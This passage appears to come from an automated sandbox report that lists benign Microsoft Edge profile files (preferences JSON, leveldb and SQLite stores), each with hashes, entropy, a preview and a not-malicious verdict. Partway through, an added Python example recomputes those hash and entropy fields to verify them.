Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):37817
Entropy (8bit):5.556328312474803
Encrypted:false
SSDEEP:768:TOhlElj7pLGLhDpWPdBfN38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pfDdF:TOhlElVchDpWPdBfN3u1jaH1IO/pZutc
MD5:C20FCC20FB4DF6A034F4ED9236E52032
SHA1:7BC6C4212679FA1B40EB02D5CBA5F766015C8968
SHA-256:3EA3D223977DF147EB678548C7739A02F529061A1B40E60FE6BECFBF68E21B25
SHA-512:7755F608AD676DC59E8E02DBA92D5009F23B76DEF60637C2E0AA818E1637B552EEAF28928A6CBA6068FF502E389603D714739FD9EAB03CF5E59E39EBD39DA8F2
Malicious:false
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (17481), with no line terminators
Category:dropped
Size (bytes):17483
Entropy (8bit):5.415698847941595
Encrypted:false
SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3ScYjY5pEwqi5WcHbbK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3A3yWeepUjQwYx
MD5:42FF8251BACE1C5EB50B4A414D33BEDA
SHA1:C6999A1FD128DED61FA7371C6BD1C0CA28B8AE72
SHA-256:AAFAAA60DC936955F4B45DB2BE6B9F2518A2EF6558CCF5994A0FBB4DBFDFB482
SHA-512:51446359DE6387ECAB6EFB2882A07EA69250A7B3D03733E86A008D6D0BC8E711ADAD69E7AADB93F3EBDE3EA30E212AAC2DB65A83BE171F9B3F92770FFF73F970
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18136), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):18138
                                                                                                                                                            Entropy (8bit):5.4572041692844735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3SewAYjY5pEwqi5WcHbbK8Gpj+FeJYQwHtv5dld:sV7LAJu4NJk3nu3yWeepUjQwV5x
                                                                                                                                                            MD5:FE917CF7C5E1D4DEA18709399E3F3EF6
                                                                                                                                                            SHA1:42BCA12E8CF54047DACE71E40273D8CB1C36274F
                                                                                                                                                            SHA-256:8BE360E5A6546A067CF650BD8C9C7FEC1CD1FBD455C341227A9C58F8B265F5AF
                                                                                                                                                            SHA-512:91465820F2DFAD61C73D78F4F39BF37057F88043FB2989022CBF5E102394DB65CCD4EDD18F039C0F077A8223C5E4067B9A6CBCD12CC381E24C8CE47860DC8D68
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):1695826
                                                                                                                                                            Entropy (8bit):5.041128864719659
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:5PfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:5PfZ/mS5
                                                                                                                                                            MD5:D7837E6409284D571B36153D0CE15847
                                                                                                                                                            SHA1:64439C13C1E19D767B8A6199E331E295EB613E5D
                                                                                                                                                            SHA-256:B3BDBD238DC1699BBC607785699B1234D80117ADF92D7F2AF8B2EC579BA4C344
                                                                                                                                                            SHA-512:3802227F53F62BFA71C81A037E7EEF96AD3188DF9F4432822E76C6A60BEEF1D53905F616E9A929BA0E5E1087F6E23795FE95C874EF4A4DFFA77C8EF4DF1B898E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...m.................DB_VERSION.1...P.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380674704087243.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].v._.................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380674704108410.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):293
                                                                                                                                                            Entropy (8bit):5.098233835674233
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/pvu1wkn23oH+Tcwt9Eh1ZB2KLl9pr4N+q2Pwkn23oH+Tcwt9Eh1tIFUv:7/pv5fYeb9Eh1ZFLzpFvYfYeb9Eh16F2
                                                                                                                                                            MD5:B81D3419CE4A6B652E458B82319EFDDB
                                                                                                                                                            SHA1:BAE6961DBD442D0E7FA6AEACE4BDE59465134293
                                                                                                                                                            SHA-256:BB9FC1D1481C79BDADB35F503193CCB63BE29552F70CE230E9F087E56B6E08C7
                                                                                                                                                            SHA-512:4F47A2E6CE3391F4C53EE55A07C357FAA3AD73BC05EB2CFA6509062EAEC50B96D2A1BC9089B2026703891F99BE0DFC4B5934ADEA22FB1862A51D72F04506C247
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:03.070 1c58 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/06-17:05:03.124 1c58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
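The Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512 and Preview fields above are the values an analyst uses to match a dropped file against a sample on disk or in another report, so it is worth being able to recompute them. The script below is an added example, not part of the Joe Sandbox report or its tooling. It reconstructs two of the dropped files from their Size and Preview fields (an assumption: the 1-byte file is a single "." and the 16-byte file is the leveldb CURRENT pointer "MANIFEST-000001" followed by a newline), recomputes each field with hashlib and a Shannon entropy routine, and reports any field that disagrees with the values printed in the report:

```python
import hashlib
import math
from collections import Counter

# Constructed sample inputs reproducing two of the dropped files listed above.
# Their contents are inferred from the report's Size and Preview fields.
SAMPLE_FILES = {
    # 1-byte file whose Preview is "."
    "dot": b".",
    # 16-byte leveldb CURRENT file: "MANIFEST-000001" plus a newline
    "current": b"MANIFEST-000001\n",
}

# Values copied from the report entries above, lower-cased for comparison.
REPORTED = {
    "dot": {
        "size": 1,
        "entropy": 0.0,
        "md5": "5058f1af8388633f609cadb75a75dc9d",
        "sha1": "3a52ce780950d4d969792a2559cd519d7ee8c727",
        "sha256": "cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8",
    },
    "current": {
        "size": 16,
        "entropy": 3.2743974703476995,
        "md5": "46295cac801e5d4857d09837238a6394",
        "sha1": "44e0fa1b517dbf802b18faf0785eeea6ac51594b",
        "sha256": "0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443",
    },
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    h = -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
    return h if h else 0.0  # normalise -0.0 (single distinct byte) to 0.0


def describe(data: bytes) -> dict:
    """Compute the hash and entropy fields the report prints for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def verify(data: bytes, reported: dict, tol: float = 1e-9) -> list:
    """Return the names of reported fields whose recomputed value disagrees."""
    actual = describe(data)
    mismatches = []
    for field, expected in reported.items():
        got = actual[field]
        if field == "entropy":
            ok = abs(got - expected) <= tol
        else:
            ok = str(got).lower() == str(expected).lower()
        if not ok:
            mismatches.append(field)
    return mismatches


if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        bad = verify(data, REPORTED[name])
        print(name, "OK" if not bad else f"MISMATCH: {bad}")
```

Two practical notes. Entropy is the one field that needs a tolerance, since the report prints a double and summation order can shift the last digits; the hashes must match exactly. The File Type field, by contrast, is a libmagic-style signature match and is only a hint: the 41-byte file labelled "OpenPGP Secret Key" is plainly a leveldb manifest (its preview contains "leveldb.BytewiseComparator"), and the 8192-byte file labelled "FoxPro FPT" has entropy 0.01, i.e. it is almost entirely zero bytes, so neither label is evidence of PGP key material or dBase data. When a File Type looks implausible, trust the hashes, size, entropy and preview over the label.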
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12288
                                                                                                                                                            Entropy (8bit):0.3202460253800455
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                            MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                            SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                            SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                            SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):0.46264415445953566
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu2:TouQq3qh7z3bY2LNW9WMcUvBu2
                                                                                                                                                            MD5:2D140C661F4801690D935779D661E636
                                                                                                                                                            SHA1:C942CE153AEF248AC420CA2D74E54D6DC7F74822
                                                                                                                                                            SHA-256:B9B88D303CFF256AFDBE4CB6C1D1030534BBF7836E0A0A46425832CEE40174F7
                                                                                                                                                            SHA-512:5D0AA6485085F130F5BE4F006B3F08AF7D402EE20E5817C9C9F4596EBB1CEB2EA29987A6C5BED22150925E8998468BE236F92B2B2FC0B1E369D49FD111CF9C99
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.448177365217996E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlc3K:Ls3c6
                                                                                                                                                            MD5:2713450656905B1F0747480B17CEADF8
                                                                                                                                                            SHA1:BD4CB75BFAC3C3CA66B936E48B3BC439E6933E66
                                                                                                                                                            SHA-256:6DA48B67334C58B2F2519CD33F45ED4044A0B1D3FAD7E60E9B817363F8B0F152
                                                                                                                                                            SHA-512:6EA07983CE777F9FAEE7EE52B840162E1F84878961F86DBEF3B51242018113EC21567A0DFD5CDE43FA1A919C2D35693E03B4227F9A695BDEA8ECB53354F77FD5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................................F.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):33
                                                                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...m.................DB_VERSION.1
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):303
